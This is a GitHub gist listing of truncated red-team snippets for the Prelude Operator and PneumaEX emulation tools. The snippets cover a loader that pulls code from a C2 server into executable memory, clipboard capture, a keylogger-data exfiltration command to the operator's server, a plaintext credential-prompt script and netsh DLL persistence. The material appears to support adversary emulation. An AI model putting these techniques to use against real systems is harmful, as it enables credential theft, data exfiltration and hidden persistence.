khyberspache
/ pie_blob.c
Created
December 23, 2020 22:05
Position Independent Executable example for article
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // example pie_blob.c | |
| int f1(int v, void (* exit)(int)){ | |
| (*exit)(0); | |
| return v; | |
| } |
khyberspache
/ pie_blob_loader.c
Created
December 23, 2020 22:07
Position Independent Executable loader example for article
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Request the pie_blob module from the C2 server | |
| // mmap exectuable memory | |
| fptr = mmap(NULL, sb.st_size, PROT_READ | PROT_EXEC | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); | |
| // read the blob into memory | |
| result = fread(fptr, 1, sb.st_size, pBlob); | |
| // grab whatever libraries/symbols I want (or even better, just get pointers to dlsym/dlopen) | |
| handle = dlopen(LIBC_FILE, RTLD_LAZY); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| func RunCommand(message string, executor string, payloadPath string) (string, int, int) { | |
| if executor == "keyword" { | |
| switch message { | |
| case "stop agent": | |
| os.Exit(0) | |
| case "module": | |
| // do module stuff | |
| default: | |
| // do other stuff | |
| } |
khyberspache
/ module_syntax.yml
Created
December 23, 2020 22:09
Module syntax for ability yaml file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| module.collect.captureClipboard |
khyberspache
/ payload_syntax.yml
Created
December 23, 2020 22:10
Modular payloads syntax for Prelude Operator
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #{operator.payloads}/path/to/payload/collect-windows.exe | |
| #{operator.payloads}/path/to/payload/collect-linux | |
| #{operator.payloads}/path/to/payload/collect-darwin |
khyberspache
/ capabilities.go
Created
December 23, 2020 22:11
Module capability definition file for PneumaEX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import () | |
| var ( | |
| ModuleName = "collect" | |
| Functions = map[string]func(args []string) ([]byte, int){ | |
| "captureClipboard": captureClipboard, | |
| } | |
| ExecFunctions = map[string]func(args string) (){ |
khyberspache
/ modular_command_args.yml
Created
December 23, 2020 22:12
Example of argument passthrough to module for PneumaEX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| command: | | |
| module.exfil.httpServer.["#{operator.http}", "#{file.T1056.001}", "#{agent.name}", "#{operator.session}"] |
khyberspache
/ standalone_func.go
Created
December 23, 2020 22:12
Standalone function call example for PneumaEX
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RunStandalone("GoCapture", "C:\File\Path\To\Capture\into.tmp") |
khyberspache
/ Invoke-PromptForCredentials.ps1
Last active
January 19, 2021 15:27
Prompt a user for credentials on Windows and dump in plaintext
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $type=@" | |
| using System; | |
| using System.Text; | |
| using System.Runtime.InteropServices; | |
| public static class CredUI | |
| { | |
| [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] | |
| private struct CREDUI_INFO |
khyberspache
/ whisperNetshHelperPersist.cpp
Created
January 19, 2021 14:41
Use SysWhispers with NetSh DLL helper persistence to spawn processes at a given registry key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <locale> | |
| #include <cstdlib> | |
| #include <stdio.h> | |
| #include <string> | |
| #include <Windows.h> | |
| #include "Syscalls.h" | |
| LONG GetStringRegKey(HKEY, const std::wstring&, std::wstring&, const std::wstring&); | |
| DWORD WINAPI RunBin(LPVOID lpParameter) { |
OlderNewer